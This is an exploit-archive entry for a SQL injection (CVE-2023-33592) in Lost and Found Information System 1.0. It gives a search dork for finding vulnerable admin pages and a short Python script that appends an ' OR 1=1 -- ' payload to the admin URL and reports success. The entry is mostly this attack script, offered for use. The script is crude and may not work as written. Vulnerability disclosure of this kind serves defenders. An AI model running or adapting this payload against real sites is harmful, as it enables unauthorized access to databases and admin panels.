Headline
Lost And Found Information System 1.0 SQL Injection
Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system_info/contact_information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system_info/contact_information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 -- "# Send the request with the injected payloadresponse = requests.get(url + payload)# Check if the SQL injection was successfulif "admin" in response.text: print("SQL injection successful!")else: print("SQL injection failed.")Related news
CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE
Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.